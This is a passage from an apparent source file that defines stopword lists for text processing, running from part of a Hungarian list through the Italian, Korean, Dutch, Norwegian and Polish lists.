"hatodikat",
"hatot",
"hatvan",
"helyett",
"hetedik",
"hetediket",
"hetet",
"hetven",
"hirtelen",
"hiszen",
"hiába",
"hogy",
"hogyan",
"hol",
"holnap",
"holnapot",
"honnan",
"hova",
"hozzá",
"hozzád",
"hozzájuk",
"hozzám",
"hozzánk",
"hozzátok",
"hurrá",
"huszadik",
"hány",
"hányszor",
"hármat",
"három",
"hát",
"hátha",
"hátulsó",
"hét",
"húsz",
"ide",
"ide-оda",
"idén",
"igazán",
"igen",
"ill",
"illetve",
"ilyen",
"ilyenkor",
"immár",
"inkább",
"is",
"ismét",
"ison",
"itt",
"jelenleg",
"jobban",
"jobbra",
"jó",
"jól",
"jólesik",
"jóval",
"jövőre",
"kell",
"kellene",
"kellett",
"kelljen",
"keressünk",
"keresztül",
"ketten",
"kettő",
"kettőt",
"kevés",
"ki",
"kiben",
"kiből",
"kicsit",
"kicsoda",
"kihez",
"kik",
"kikbe",
"kikben",
"kikből",
"kiken",
"kiket",
"kikhez",
"kikkel",
"kikké",
"kiknek",
"kiknél",
"kikre",
"kikről",
"kiktől",
"kikért",
"kilenc",
"kilencedik",
"kilencediket",
"kilencet",
"kilencven",
"kin",
"kinek",
"kinél",
"kire",
"kiről",
"kit",
"kitől",
"kivel",
"kivé",
"kié",
"kiért",
"korábban",
"képest",
"kérem",
"kérlek",
"kész",
"késő",
"később",
"későn",
"két",
"kétszer",
"kívül",
"körül",
"köszönhetően",
"köszönöm",
"közben",
"közel",
"közepesen",
"közepén",
"közé",
"között",
"közül",
"külön",
"különben",
"különböző",
"különbözőbb",
"különbözőek",
"lassan",
"le",
"legalább",
"legyen",
"lehet",
"lehetetlen",
"lehetett",
"lehetőleg",
"lehetőség",
"lenne",
"lenni",
"lennék",
"lennének",
"lesz",
"leszek",
"lesznek",
"leszünk",
"lett",
"lettek",
"lettem",
"lettünk",
"lévő",
"ma",
"maga",
"magad",
"magam",
"magatokat",
"magukat",
"magunkat",
"magát",
"mai",
"majd",
"majdnem",
"manapság",
"meg",
"megcsinál",
"megcsinálnak",
"megint",
"megvan",
"mellett",
"mellette",
"melletted",
"mellettem",
"mellettetek",
"mellettük",
"mellettünk",
"mellé",
"melléd",
"melléjük",
"mellém",
"mellénk",
"mellétek",
"mellől",
"mellőle",
"mellőled",
"mellőlem",
"mellőletek",
"mellőlük",
"mellőlünk",
"mely",
"melyek",
"melyik",
"mennyi",
"mert",
"mi",
"miatt",
"miatta",
"miattad",
"miattam",
"miattatok",
"miattuk",
"miattunk",
"mibe",
"miben",
"miből",
"mihez",
"mik",
"mikbe",
"mikben",
"mikből",
"miken",
"miket",
"mikhez",
"mikkel",
"mikké",
"miknek",
"miknél",
"mikor",
"mikre",
"mikről",
"miktől",
"mikért",
"milyen",
"min",
"mind",
"mindegyik",
"mindegyiket",
"minden",
"mindenesetre",
"mindenki",
"mindent",
"mindenütt",
"mindig",
"mindketten",
"minek",
"minket",
"mint",
"mintha",
"minél",
"mire",
"miről",
"mit",
"mitől",
"mivel",
"mivé",
"miért",
"mondta",
"most",
"mostanáig",
"már",
"más",
"másik",
"másikat",
"másnap",
"második",
"másodszor",
"mások",
"másokat",
"mást",
"még",
"mégis",
"míg",
"mögé",
"mögéd",
"mögéjük",
"mögém",
"mögénk",
"mögétek",
"mögött",
"mögötte",
"mögötted",
"mögöttem",
"mögöttetek",
"mögöttük",
"mögöttünk",
"mögül",
"mögüle",
"mögüled",
"mögülem",
"mögületek",
"mögülük",
"mögülünk",
"múltkor",
"múlva",
"na",
"nagy",
"nagyobb",
"nagyon",
"naponta",
"napot",
"ne",
"negyedik",
"negyediket",
"negyven",
"neked",
"nekem",
"neki",
"nekik",
"nektek",
"nekünk",
"nem",
"nemcsak",
"nemrég",
"nincs",
"nyolc",
"nyolcadik",
"nyolcadikat",
"nyolcat",
"nyolcvan",
"nála",
"nálad",
"nálam",
"nálatok",
"náluk",
"nálunk",
"négy",
"négyet",
"néha",
"néhány",
"nélkül",
"o",
"oda",
"ok",
"olyan",
"onnan",
"ott",
"pedig",
"persze",
"pár",
"például",
"rajta",
"rajtad",
"rajtam",
"rajtatok",
"rajtuk",
"rajtunk",
"rendben",
"rosszul",
"rá",
"rád",
"rájuk",
"rám",
"ránk",
"rátok",
"régen",
"régóta",
"részére",
"róla",
"rólad",
"rólam",
"rólatok",
"róluk",
"rólunk",
"rögtön",
"s",
"saját",
"se",
"sem",
"semmi",
"semmilyen",
"semmiség",
"senki",
"soha",
"sok",
"sokan",
"sokat",
"sokkal",
"sokszor",
"sokáig",
"során",
"stb.",
"szemben",
"szerbusz",
"szerint",
"szerinte",
"szerinted",
"szerintem",
"szerintetek",
"szerintük",
"szerintünk",
"szervusz",
"szinte",
"számára",
"száz",
"századik",
"százat",
"szépen",
"szét",
"szíves",
"szívesen",
"szíveskedjék",
"sőt",
"talán",
"tavaly",
"te",
"tegnap",
"tegnapelőtt",
"tehát",
"tele",
"teljes",
"tessék",
"ti",
"tied",
"titeket",
"tizedik",
"tizediket",
"tizenegy",
"tizenegyedik",
"tizenhat",
"tizenhárom",
"tizenhét",
"tizenkettedik",
"tizenkettő",
"tizenkilenc",
"tizenkét",
"tizennyolc",
"tizennégy",
"tizenöt",
"tizet",
"tovább",
"további",
"továbbá",
"távol",
"téged",
"tényleg",
"tíz",
"több",
"többi",
"többször",
"túl",
"tőle",
"tőled",
"tőlem",
"tőletek",
"tőlük",
"tőlünk",
"ugyanakkor",
"ugyanez",
"ugyanis",
"ugye",
"urak",
"uram",
"urat",
"utoljára",
"utolsó",
"után",
"utána",
"vagy",
"vagyis",
"vagyok",
"vagytok",
"vagyunk",
"vajon",
"valahol",
"valaki",
"valakit",
"valamelyik",
"valami",
"valamint",
"való",
"van",
"vannak",
"vele",
"veled",
"velem",
"veletek",
"velük",
"velünk",
"vissza",
"viszlát",
"viszont",
"viszontlátásra",
"volna",
"volnának",
"volnék",
"volt",
"voltak",
"voltam",
"voltunk",
"végre",
"végén",
"végül",
"által",
"általában",
"ám",
"át",
"éljen",
"én",
"éppen",
"érte",
"érted",
"értem",
"értetek",
"értük",
"értünk",
"és",
"év",
"évben",
"éve",
"évek",
"éves",
"évi",
"évvel",
"így",
"óta",
"ön",
"önbe",
"önben",
"önből",
"önhöz",
"önnek",
"önnel",
"önnél",
"önre",
"önről",
"önt",
"öntől",
"önért",
"önök",
"önökbe",
"önökben",
"önökből",
"önöket",
"önökhöz",
"önökkel",
"önöknek",
"önöknél",
"önökre",
"önökről",
"önöktől",
"önökért",
"önökön",
"önön",
"össze",
"öt",
"ötven",
"ötödik",
"ötödiket",
"ötöt",
"úgy",
"úgyis",
"úgynevezett",
"új",
"újabb",
"újra",
"úr",
"ő",
"ők",
"őket",
"őt",
],
"it": [
"IE",
"a",
"abbastanza",
"abbia",
"abbiamo",
"abbiano",
"abbiate",
"accidenti",
"ad",
"adesso",
"affinche",
"agl",
"agli",
"ahime",
"ahimè",
"ai",
"al",
"alcuna",
"alcuni",
"alcuno",
"all",
"alla",
"alle",
"allo",
"allora",
"altri",
"altrimenti",
"altro",
"altrove",
"altrui",
"anche",
"ancora",
"anni",
"anno",
"ansa",
"anticipo",
"assai",
"attesa",
"attraverso",
"avanti",
"avemmo",
"avendo",
"avente",
"aver",
"avere",
"averlo",
"avesse",
"avessero",
"avessi",
"avessimo",
"aveste",
"avesti",
"avete",
"aveva",
"avevamo",
"avevano",
"avevate",
"avevi",
"avevo",
"avrai",
"avranno",
"avrebbe",
"avrebbero",
"avrei",
"avremmo",
"avremo",
"avreste",
"avresti",
"avrete",
"avrà",
"avrò",
"avuta",
"avute",
"avuti",
"avuto",
"basta",
"bene",
"benissimo",
"berlusconi",
"brava",
"bravo",
"c",
"casa",
"caso",
"cento",
"certa",
"certe",
"certi",
"certo",
"che",
"chi",
"chicchessia",
"chiunque",
"ci",
"ciascuna",
"ciascuno",
"cima",
"cio",
"cioe",
"cioè",
"circa",
"citta",
"città",
"ciò",
"co",
"codesta",
"codesti",
"codesto",
"cogli",
"coi",
"col",
"colei",
"coll",
"coloro",
"colui",
"come",
"cominci",
"comunque",
"con",
"concernente",
"conciliarsi",
"conclusione",
"consiglio",
"contro",
"cortesia",
"cos",
"cosa",
"cosi",
"così",
"cui",
"d",
"da",
"dagl",
"dagli",
"dai",
"dal",
"dall",
"dalla",
"dalle",
"dallo",
"dappertutto",
"davanti",
"degl",
"degli",
"dei",
"del",
"dell",
"della",
"delle",
"dello",
"dentro",
"detto",
"deve",
"di",
"dice",
"dietro",
"dire",
"dirimpetto",
"diventa",
"diventare",
"diventato",
"dopo",
"dov",
"dove",
"dovra",
"dovrà",
"dovunque",
"due",
"dunque",
"durante",
"e",
"ebbe",
"ebbero",
"ebbi",
"ecc",
"ecco",
"ed",
"effettivamente",
"egli",
"ella",
"entrambi",
"eppure",
"era",
"erano",
"eravamo",
"eravate",
"eri",
"ero",
"esempio",
"esse",
"essendo",
"esser",
"essere",
"essi",
"ex",
"fa",
"faccia",
"facciamo",
"facciano",
"facciate",
"faccio",
"facemmo",
"facendo",
"facesse",
"facessero",
"facessi",
"facessimo",
"faceste",
"facesti",
"faceva",
"facevamo",
"facevano",
"facevate",
"facevi",
"facevo",
"fai",
"fanno",
"farai",
"faranno",
"fare",
"farebbe",
"farebbero",
"farei",
"faremmo",
"faremo",
"fareste",
"faresti",
"farete",
"farà",
"farò",
"fatto",
"favore",
"fece",
"fecero",
"feci",
"fin",
"finalmente",
"finche",
"fine",
"fino",
"forse",
"forza",
"fosse",
"fossero",
"fossi",
"fossimo",
"foste",
"fosti",
"fra",
"frattempo",
"fu",
"fui",
"fummo",
"fuori",
"furono",
"futuro",
"generale",
"gia",
"giacche",
"giorni",
"giorno",
"già",
"gli",
"gliela",
"gliele",
"glieli",
"glielo",
"gliene",
"governo",
"grande",
"grazie",
"gruppo",
"ha",
"haha",
"hai",
"hanno",
"ho",
"i",
"ieri",
"il",
"improvviso",
"in",
"inc",
"infatti",
"inoltre",
"insieme",
"intanto",
"intorno",
"invece",
"io",
"l",
"la",
"lasciato",
"lato",
"lavoro",
"le",
"lei",
"li",
"lo",
"lontano",
"loro",
"lui",
"lungo",
"luogo",
"là",
"ma",
"macche",
"magari",
"maggior",
"mai",
"male",
"malgrado",
"malissimo",
"mancanza",
"marche",
"me",
"medesimo",
"mediante",
"meglio",
"meno",
"mentre",
"mesi",
"mezzo",
"mi",
"mia",
"mie",
"miei",
"mila",
"miliardi",
"milioni",
"minimi",
"ministro",
"mio",
"modo",
"molti",
"moltissimo",
"molto",
"momento",
"mondo",
"mosto",
"nazionale",
"ne",
"negl",
"negli",
"nei",
"nel",
"nell",
"nella",
"nelle",
"nello",
"nemmeno",
"neppure",
"nessun",
"nessuna",
"nessuno",
"niente",
"no",
"noi",
"non",
"nondimeno",
"nonostante",
"nonsia",
"nostra",
"nostre",
"nostri",
"nostro",
"novanta",
"nove",
"nulla",
"nuovo",
"o",
"od",
"oggi",
"ogni",
"ognuna",
"ognuno",
"oltre",
"oppure",
"ora",
"ore",
"osi",
"ossia",
"ottanta",
"otto",
"paese",
"parecchi",
"parecchie",
"parecchio",
"parte",
"partendo",
"peccato",
"peggio",
"per",
"perche",
"perchè",
"perché",
"percio",
"perciò",
"perfino",
"pero",
"persino",
"persone",
"però",
"piedi",
"pieno",
"piglia",
"piu",
"piuttosto",
"più",
"po",
"pochissimo",
"poco",
"poi",
"poiche",
"possa",
"possedere",
"posteriore",
"posto",
"potrebbe",
"preferibilmente",
"presa",
"press",
"prima",
"primo",
"principalmente",
"probabilmente",
"proprio",
"puo",
"pure",
"purtroppo",
"può",
"qualche",
"qualcosa",
"qualcuna",
"qualcuno",
"quale",
"quali",
"qualunque",
"quando",
"quanta",
"quante",
"quanti",
"quanto",
"quantunque",
"quasi",
"quattro",
"quel",
"quella",
"quelle",
"quelli",
"quello",
"quest",
"questa",
"queste",
"questi",
"questo",
"qui",
"quindi",
"realmente",
"recente",
"recentemente",
"registrazione",
"relativo",
"riecco",
"salvo",
"sara",
"sarai",
"saranno",
"sarebbe",
"sarebbero",
"sarei",
"saremmo",
"saremo",
"sareste",
"saresti",
"sarete",
"sarà",
"sarò",
"scola",
"scopo",
"scorso",
"se",
"secondo",
"seguente",
"seguito",
"sei",
"sembra",
"sembrare",
"sembrato",
"sembri",
"sempre",
"senza",
"sette",
"si",
"sia",
"siamo",
"siano",
"siate",
"siete",
"sig",
"solito",
"solo",
"soltanto",
"sono",
"sopra",
"sotto",
"spesso",
"srl",
"sta",
"stai",
"stando",
"stanno",
"starai",
"staranno",
"starebbe",
"starebbero",
"starei",
"staremmo",
"staremo",
"stareste",
"staresti",
"starete",
"starà",
"starò",
"stata",
"state",
"stati",
"stato",
"stava",
"stavamo",
"stavano",
"stavate",
"stavi",
"stavo",
"stemmo",
"stessa",
"stesse",
"stessero",
"stessi",
"stessimo",
"stesso",
"steste",
"stesti",
"stette",
"stettero",
"stetti",
"stia",
"stiamo",
"stiano",
"stiate",
"sto",
"su",
"sua",
"subito",
"successivamente",
"successivo",
"sue",
"sugl",
"sugli",
"sui",
"sul",
"sull",
"sulla",
"sulle",
"sullo",
"suo",
"suoi",
"tale",
"tali",
"talvolta",
"tanto",
"te",
"tempo",
"ti",
"titolo",
"torino",
"tra",
"tranne",
"tre",
"trenta",
"troppo",
"trovato",
"tu",
"tua",
"tue",
"tuo",
"tuoi",
"tutta",
"tuttavia",
"tutte",
"tutti",
"tutto",
"uguali",
"ulteriore",
"ultimo",
"un",
"una",
"uno",
"uomo",
"va",
"vale",
"vari",
"varia",
"varie",
"vario",
"verso",
"vi",
"via",
"vicino",
"visto",
"vita",
"voi",
"volta",
"volte",
"vostra",
"vostre",
"vostri",
"vostro",
"è",
],
"ko": [
"!",
'"',
"$",
"%",
"&",
"'",
"(",
")",
"*",
"+",
",",
"-",
".",
"...",
"0",
"1",
"2",
"3",
"4",
"5",
"6",
"7",
"8",
"9",
";",
"<",
"=",
">",
"?",
"@",
"\\",
"^",
"_",
"`",
"|",
"~",
"·",
"—",
"——",
"‘",
"’",
"“",
"”",
"…",
"、",
"。",
"〈",
"〉",
"《",
"》",
"가",
"가까스로",
"가령",
"각",
"각각",
"각자",
"각종",
"갖고말하자면",
"같다",
"같이",
"개의치않고",
"거니와",
"거바",
"거의",
"것",
"것과 같이",
"것들",
"게다가",
"게우다",
"겨우",
"견지에서",
"결과에 이르다",
"결국",
"결론을 낼 수 있다",
"겸사겸사",
"고려하면",
"고로",
"곧",
"공동으로",
"과",
"과연",
"관계가 있다",
"관계없이",
"관련이 있다",
"관하여",
"관한",
"관해서는",
"구",
"구체적으로",
"구토하다",
"그",
"그들",
"그때",
"그래",
"그래도",
"그래서",
"그러나",
"그러니",
"그러니까",
"그러면",
"그러므로",
"그러한즉",
"그런 까닭에",
"그런데",
"그런즉",
"그럼",
"그럼에도 불구하고",
"그렇게 함으로써",
"그렇지",
"그렇지 않다면",
"그렇지 않으면",
"그렇지만",
"그렇지않으면",
"그리고",
"그리하여",
"그만이다",
"그에 따르는",
"그위에",
"그저",
"그중에서",
"그치지 않다",
"근거로",
"근거하여",
"기대여",
"기점으로",
"기준으로",
"기타",
"까닭으로",
"까악",
"까지",
"까지 미치다",
"까지도",
"꽈당",
"끙끙",
"끼익",
"나",
"나머지는",
"남들",
"남짓",
"너",
"너희",
"너희들",
"네",
"넷",
"년",
"논하지 않다",
"놀라다",
"누가 알겠는가",
"누구",
"다른",
"다른 방면으로",
"다만",
"다섯",
"다소",
"다수",
"다시 말하자면",
"다시말하면",
"다음",
"다음에",
"다음으로",
"단지",
"답다",
"당신",
"당장",
"대로 하다",
"대하면",
"대하여",
"대해 말하자면",
"대해서",
"댕그",
"더구나",
"더군다나",
"더라도",
"더불어",
"더욱더",
"더욱이는",
"도달하다",
"도착하다",
"동시에",
"동안",
"된바에야",
"된이상",
"두번째로",
"둘",
"둥둥",
"뒤따라",
"뒤이어",
"든간에",
"들",
"등",
"등등",
"딩동",
"따라",
"따라서",
"따위",
"따지지 않다",
"딱",
"때",
"때가 되어",
"때문에",
"또",
"또한",
"뚝뚝",
"라 해도",
"령",
"로",
"로 인하여",
"로부터",
"로써",
"륙",
"를",
"마음대로",
"마저",
"마저도",
"마치",
"막론하고",
"만 못하다",
"만약",
"만약에",
"만은 아니다",
"만이 아니다",
"만일",
"만큼",
"말하자면",
"말할것도 없고",
"매",
"매번",
"메쓰겁다",
"몇",
"모",
"모두",
"무렵",
"무릎쓰고",
"무슨",
"무엇",
"무엇때문에",
"물론",
"및",
"바꾸어말하면",
"바꾸어말하자면",
"바꾸어서 말하면",
"바꾸어서 한다면",
"바꿔 말하면",
"바로",
"바와같이",
"밖에 안된다",
"반대로",
"반대로 말하자면",
"반드시",
"버금",
"보는데서",
"보다더",
"보드득",
"본대로",
"봐",
"봐라",
"부류의 사람들",
"부터",
"불구하고",
"불문하고",
"붕붕",
"비걱거리다",
"비교적",
"비길수 없다",
"비로소",
"비록",
"비슷하다",
"비추어 보아",
"비하면",
"뿐만 아니라",
"뿐만아니라",
"뿐이다",
"삐걱",
"삐걱거리다",
"사",
"삼",
"상대적으로 말하자면",
"생각한대로",
"설령",
"설마",
"설사",
"셋",
"소생",
"소인",
"솨",
"쉿",
"습니까",
"습니다",
"시각",
"시간",
"시작하여",
"시초에",
"시키다",
"실로",
"심지어",
"아",
"아니",
"아니나다를가",
"아니라면",
"아니면",
"아니었다면",
"아래윗",
"아무거나",
"아무도",
"아야",
"아울러",
"아이",
"아이고",
"아이구",
"아이야",
"아이쿠",
"아하",
"아홉",
"안 그러면",
"않기 위하여",
"않기 위해서",
"알 수 있다",
"알았어",
"앗",
"앞에서",
"앞의것",
"야",
"약간",
"양자",
"어",
"어기여차",
"어느",
"어느 년도",
"어느것",
"어느곳",
"어느때",
"어느쪽",
"어느해",
"어디",
"어때",
"어떠한",
"어떤",
"어떤것",
"어떤것들",
"어떻게",
"어떻해",
"어이",
"어째서",
"어쨋든",
"어쩔수 없다",
"어찌",
"어찌됏든",
"어찌됏어",
"어찌하든지",
"어찌하여",
"언제",
"언젠가",
"얼마",
"얼마 안 되는 것",
"얼마간",
"얼마나",
"얼마든지",
"얼마만큼",
"얼마큼",
"엉엉",
"에",
"에 가서",
"에 달려 있다",
"에 대해",
"에 있다",
"에 한하다",
"에게",
"에서",
"여",
"여기",
"여덟",
"여러분",
"여보시오",
"여부",
"여섯",
"여전히",
"여차",
"연관되다",
"연이서",
"영",
"영차",
"옆사람",
"예",
"예를 들면",
"예를 들자면",
"예컨대",
"예하면",
"오",
"오로지",
"오르다",
"오자마자",
"오직",
"오호",
"오히려",
"와",
"와 같은 사람들",
"와르르",
"와아",
"왜",
"왜냐하면",
"외에도",
"요만큼",
"요만한 것",
"요만한걸",
"요컨대",
"우르르",
"우리",
"우리들",
"우선",
"우에 종합한것과같이",
"운운",
"월",
"위에서 서술한바와같이",
"위하여",
"위해서",
"윙윙",
"육",
"으로",
"으로 인하여",
"으로서",
"으로써",
"을",
"응",
"응당",
"의",
"의거하여",
"의지하여",
"의해",
"의해되다",
"의해서",
"이",
"이 되다",
"이 때문에",
"이 밖에",
"이 외에",
"이 정도의",
"이것",
"이곳",
"이때",
"이라면",
"이래",
"이러이러하다",
"이러한",
"이런",
"이럴정도로",
"이렇게 많은 것",
"이렇게되면",
"이렇게말하자면",
"이렇구나",
"이로 인하여",
"이르기까지",
"이리하여",
"이만큼",
"이번",
"이봐",
"이상",
"이어서",
"이었다",
"이와 같다",
"이와 같은",
"이와 반대로",
"이와같다면",
"이외에도",
"이용하여",
"이유만으로",
"이젠",
"이지만",
"이쪽",
"이천구",
"이천육",
"이천칠",
"이천팔",
"인 듯하다",
"인젠",
"일",
"일것이다",
"일곱",
"일단",
"일때",
"일반적으로",
"일지라도",
"임에 틀림없다",
"입각하여",
"입장에서",
"잇따라",
"있다",
"자",
"자기",
"자기집",
"자마자",
"자신",
"잠깐",
"잠시",
"저",
"저것",
"저것만큼",
"저기",
"저쪽",
"저희",
"전부",
"전자",
"전후",
"점에서 보아",
"정도에 이르다",
"제",
"제각기",
"제외하고",
"조금",
"조차",
"조차도",
"졸졸",
"좀",
"좋아",
"좍좍",
"주룩주룩",
"주저하지 않고",
"줄은 몰랏다",
"줄은모른다",
"중에서",
"중의하나",
"즈음하여",
"즉",
"즉시",
"지든지",
"지만",
"지말고",
"진짜로",
"쪽으로",
"차라리",
"참",
"참나",
"첫번째로",
"쳇",
"총적으로",
"총적으로 말하면",
"총적으로 보면",
"칠",
"콸콸",
"쾅쾅",
"쿵",
"타다",
"타인",
"탕탕",
"토하다",
"통하여",
"툭",
"퉤",
"틈타",
"팍",
"팔",
"퍽",
"펄렁",
"하",
"하게될것이다",
"하게하다",
"하겠는가",
"하고 있다",
"하고있었다",
"하곤하였다",
"하구나",
"하기 때문에",
"하기 위하여",
"하기는한데",
"하기만 하면",
"하기보다는",
"하기에",
"하나",
"하느니",
"하는 김에",
"하는 편이 낫다",
"하는것도",
"하는것만 못하다",
"하는것이 낫다",
"하는바",
"하더라도",
"하도다",
"하도록시키다",
"하도록하다",
"하든지",
"하려고하다",
"하마터면",
"하면 할수록",
"하면된다",
"하면서",
"하물며",
"하여금",
"하여야",
"하자마자",
"하지 않는다면",
"하지 않도록",
"하지마",
"하지마라",
"하지만",
"하하",
"한 까닭에",
"한 이유는",
"한 후",
"한다면",
"한다면 몰라도",
"한데",
"한마디",
"한적이있다",
"한켠으로는",
"한항목",
"할 따름이다",
"할 생각이다",
"할 줄 안다",
"할 지경이다",
"할 힘이 있다",
"할때",
"할만하다",
"할망정",
"할뿐",
"할수있다",
"할수있어",
"할줄알다",
"할지라도",
"할지언정",
"함께",
"해도된다",
"해도좋다",
"해봐요",
"해서는 안된다",
"해야한다",
"해요",
"했어요",
"향하다",
"향하여",
"향해서",
"허",
"허걱",
"허허",
"헉",
"헉헉",
"헐떡헐떡",
"형식으로 쓰여",
"혹시",
"혹은",
"혼자",
"훨씬",
"휘익",
"휴",
"흐흐",
"흥",
"힘입어",
"︿",
"!",
"#",
"$",
"%",
"&",
"(",
")",
"*",
"+",
",",
"0",
"1",
"2",
"3",
"4",
"5",
"6",
"7",
"8",
"9",
":",
";",
"<",
">",
"?",
"@",
"[",
"]",
"{",
"|",
"}",
"~",
"¥",
],
"nl": [
"aan",
"achte",
"achter",
"af",
"al",
"alle",
"alleen",
"alles",
"als",
"ander",
"anders",
"beetje",
"behalve",
"beide",
"beiden",
"ben",
"beneden",
"bent",
"bij",
"bijna",
"bijv",
"blijkbaar",
"blijken",
"boven",
"bv",
"daar",
"daardoor",
"daarin",
"daarna",
"daarom",
"daaruit",
"dan",
"dat",
"de",
"deden",
"deed",
"derde",
"derhalve",
"dertig",
"deze",
"dhr",
"die",
"dit",
"doe",
"doen",
"doet",
"door",
"drie",
"duizend",
"echter",
"een",
"eens",
"eerst",
"eerste",
"eigen",
"eigenlijk",
"elk",
"elke",
"en",
"enige",
"er",
"erg",
"ergens",
"etc",
"etcetera",
"even",
"geen",
"genoeg",
"geweest",
"haar",
"haarzelf",
"had",
"hadden",
"heb",
"hebben",
"hebt",
"hedden",
"heeft",
"heel",
"hem",
"hemzelf",
"hen",
"het",
"hetzelfde",
"hier",
"hierin",
"hierna",
"hierom",
"hij",
"hijzelf",
"hoe",
"honderd",
"hun",
"ieder",
"iedere",
"iedereen",
"iemand",
"iets",
"ik",
"in",
"inderdaad",
"intussen",
"is",
"ja",
"je",
"jij",
"jijzelf",
"jou",
"jouw",
"jullie",
"kan",
"kon",
"konden",
"kun",
"kunnen",
"kunt",
"laatst",
"later",
"lijken",
"lijkt",
"maak",
"maakt",
"maakte",
"maakten",
"maar",
"mag",
"maken",
"me",
"meer",
"meest",
"meestal",
"men",
"met",
"mevr",
"mij",
"mijn",
"minder",
"miss",
"misschien",
"missen",
"mits",
"mocht",
"mochten",
"moest",
"moesten",
"moet",
"moeten",
"mogen",
"mr",
"mrs",
"mw",
"na",
"naar",
"nam",
"namelijk",
"nee",
"neem",
"negen",
"nemen",
"nergens",
"niemand",
"niet",
"niets",
"niks",
"noch",
"nochtans",
"nog",
"nooit",
"nu",
"nv",
"of",
"om",
"omdat",
"ondanks",
"onder",
"ondertussen",
"ons",
"onze",
"onzeker",
"ooit",
"ook",
"op",
"over",
"overal",
"overige",
"paar",
"per",
"recent",
"redelijk",
"samen",
"sinds",
"steeds",
"te",
"tegen",
"tegenover",
"thans",
"tien",
"tiende",
"tijdens",
"tja",
"toch",
"toe",
"tot",
"totdat",
"tussen",
"twee",
"tweede",
"u",
"uit",
"uw",
"vaak",
"van",
"vanaf",
"veel",
"veertig",
"verder",
"verscheidene",
"verschillende",
"via",
"vier",
"vierde",
"vijf",
"vijfde",
"vijftig",
"volgend",
"volgens",
"voor",
"voordat",
"voorts",
"waar",
"waarom",
"waarschijnlijk",
"wanneer",
"waren",
"was",
"wat",
"we",
"wederom",
"weer",
"weinig",
"wel",
"welk",
"welke",
"werd",
"werden",
"werder",
"whatever",
"wie",
"wij",
"wijzelf",
"wil",
"wilden",
"willen",
"word",
"worden",
"wordt",
"zal",
"ze",
"zei",
"zeker",
"zelf",
"zelfde",
"zes",
"zeven",
"zich",
"zij",
"zijn",
"zijzelf",
"zo",
"zoals",
"zodat",
"zou",
"zouden",
"zulk",
"zullen",
],
"no": [
"alle",
"at",
"av",
"bare",
"begge",
"ble",
"blei",
"bli",
"blir",
"blitt",
"både",
"båe",
"da",
"de",
"deg",
"dei",
"deim",
"deira",
"deires",
"dem",
"den",
"denne",
"der",
"dere",
"deres",
"det",
"dette",
"di",
"din",
"disse",
"ditt",
"du",
"dykk",
"dykkar",
"då",
"eg",
"ein",
"eit",
"eitt",
"eller",
"elles",
"en",
"enn",
"er",
"et",
"ett",
"etter",
"for",
"fordi",
"fra",
"før",
"ha",
"hadde",
"han",
"hans",
"har",
"hennar",
"henne",
"hennes",
"her",
"hjå",
"ho",
"hoe",
"honom",
"hoss",
"hossen",
"hun",
"hva",
"hvem",
"hver",
"hvilke",
"hvilken",
"hvis",
"hvor",
"hvordan",
"hvorfor",
"i",
"ikke",
"ikkje",
"ingen",
"ingi",
"inkje",
"inn",
"inni",
"ja",
"jeg",
"kan",
"kom",
"korleis",
"korso",
"kun",
"kunne",
"kva",
"kvar",
"kvarhelst",
"kven",
"kvi",
"kvifor",
"man",
"mange",
"me",
"med",
"medan",
"meg",
"meget",
"mellom",
"men",
"mi",
"min",
"mine",
"mitt",
"mot",
"mykje",
"ned",
"no",
"noe",
"noen",
"noka",
"noko",
"nokon",
"nokor",
"nokre",
"nå",
"når",
"og",
"også",
"om",
"opp",
"oss",
"over",
"på",
"samme",
"seg",
"selv",
"si",
"sia",
"sidan",
"siden",
"sin",
"sine",
"sitt",
"sjøl",
"skal",
"skulle",
"slik",
"so",
"som",
"somme",
"somt",
"så",
"sånn",
"til",
"um",
"upp",
"ut",
"uten",
"var",
"vart",
"varte",
"ved",
"vere",
"verte",
"vi",
"vil",
"ville",
"vore",
"vors",
"vort",
"vår",
"være",
"vært",
"å",
],
"pl": [
"aby",
"ach",
"aj",
"albo",
"ale",
"ani",
"aż",
"bardzo",
"bez",
"bo",
"bowiem",
"by",
"byli",
"bym",
"być",
"był",
"była",
"było",
"były",
"będzie",
"będą",
"chce",
"choć",
"ci",
"ciebie",
"cię",
"co",
"coraz",
"coś",
"czy",
"czyli",
"często",
"daleko",
"dla",
"dlaczego",
"dlatego",
"do",
"dobrze",
"dokąd",
"dość",
"dr",
"dużo",
"dwa",
"dwaj",
"dwie",
"dwoje",
"dzisiaj",
"dziś",
"gdy",
"gdyby",
"gdyż",
"gdzie",
"go",
"godz",
"hab",
"i",
"ich",
"ii",
"iii",
"ile",
"im",
"inne",
"inny",
"inż",
"iv",
"ix",
"iż",
"ja",
"jak",
"jakby",
"jaki",
"jakie",
"jako",
"je",
"jeden",
"jedna",
"jednak",
"jedno",
"jednym",
"jedynie",
"jego",
"jej",
"jemu",
"jest",
"jestem",
"jeszcze",
"jeśli",
"jeżeli",
"już",
"ją",
"każdy",
"kiedy",
"kierunku",
"kilku",
"kto",
"która",
"które",
"którego",
"której",
"który",
"których",
"którym",
"którzy",
"ku",
"lat",
"lecz",
"lub",
"ma",
"mają",
"mam",
"mamy",
"mgr",
"mi",
"miał",
"mimo",
"mnie",
"mną",
"mogą",
"moi",
"moja",
"moje",
"może",
"można",
"mu",
"musi",
"my",
"mój",
"na",
"nad",
"nam",
"nami",
"nas",
"nasi",
"nasz",
"nasza",
"nasze",
"natychmiast",
"nawet",
"nic",
"nich",
"nie",
"niego",
"niej",
"niemu",
"nigdy",
"nim",
"nimi",
"nią",
"niż",
"no",
"nowe",
"np",
"nr",
"o",
"o.o.",
"obok",
"od",
"ok",
"około",
"on",
"ona",
"one",
"oni",
"ono",
"oraz",
"owszem",
"pan",
"pl",
"po",
"pod",
"ponad",
"ponieważ",
"poza",
"prof",
"przed",
"przede",
"przedtem",
"przez",
"przy",
"raz",
"razie",
"roku",
"również",
"sam",
"sama",
"się",
"skąd",
"sobie",
"sposób",
"swoje",
"są",
"ta",
"tak",
"taki",
"takich",
"takie",
"także",
"tam",
"te",
"tego",
"tej",
"tel",
"temu",
"ten",
"teraz",
"też",
"to",
"tobie",
"tobą",
"trzeba",
"tu",
"tutaj",
"twoi",
"twoja",
"twoje",
"twój",
"ty",
"tych",
"tylko",
"tym",
"tys",
"tzw",
"tę",
"u",
"ul",
"vi",
"vii",
"viii",
"vol",
"w",
"wam",
"wami",
"was",
"wasi",
"wasz",
"wasza",
"wasze",
"we",
"wie",
"więc",
"wszystko",
"wtedy",
"www",
"wy",
"właśnie",
"wśród",
"xi",
"xii",
"xiii",
